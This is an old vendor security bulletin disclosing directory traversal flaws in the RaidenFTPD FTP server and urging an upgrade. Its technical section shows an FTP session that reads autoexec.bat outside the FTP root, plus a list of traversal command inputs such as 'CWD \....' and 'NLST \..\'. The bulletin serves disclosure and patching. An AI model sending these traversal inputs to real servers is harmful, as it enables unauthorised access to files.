RaidenFTPD security bulletin : RSB-001

@
RaidenFTPD Directory Traversal Vulnerabilities
discovered on : 2001-04-30
victims : All RaidenFTPD versions prior than v2.1 build 952
solution : Upgrade to RaidenFTPD v2.2 build 221
@

Who should read this bulletin: Customers using RaidenFTPD v2.1 build 1~952

Impact of vulnerability: Gain access to directories and files outside of the ftp root directory

Recommendation: Customers using RaidenFTPD v2.1 build 1~952 should upgrade to v2.2 build 221 immediatelly

Affected Software:

RaidenFTPD v2.1 1~951

Patch availability
Download locations for this patch

full install http://www.raidenmaild.com/download/raidenftpd2.exe

update only download

Technical details

The following is an illustration of the problem:

> ftp localhost
220-This FTP site is running free version of RaidenFTPD
220-Download chinese version from http://playstation2.idv.tw/raiden-ftpd-
site/
220-Download english version from http://playstation2.idv.tw/raidenftpd/
220-RaidenFTPD32 for RaidenFTPD (up since 2001/04/20 15:00)
220-This server is for private use only
220-If you do not have access to this server
220-Please disconnect now
220 Please enter your login name now.
User (xxxxxxxx.xx.xxx.edu:(none)): jdog
331 Password required for jdog .
Password:
[really long login banner edited out]
230 User jdog logged in , proceed.
ftp> get ....\....\autoexec.bat
200 Port command ok.
150 Sending /....\....\autoexec.bat (419 bytes). Mode STREAM Type ASCII
226 Transfer finished successfully. Data connection closed.
ftp: 419 bytes received in 0.27Seconds 1.55Kbytes/sec.
ftp> cd ....
250 "/.." is current directory.

This excerpt was taken from a session involving build #947. The vendor released four builds since it was initially contacted. The following is a list of vulnerabilities that affected these intermediate versions:

CWD \....
CWD *\.....
CWD /..../
NLST ..
NLST ...
NLST \..\
NLST \...\

Disclaimer
The information provided in the RaidenFTPD security bulletin is provided "as is" without warranty of any kind. RaidenFTPD team disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall RaidenFTPD team be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RaidenFTPD team have been advised of the possibility of such damages.

Copyright © RaidenFTPD TEAM , ALL RIGHT RESERVED

REVISION 2.2 , 2001/10/15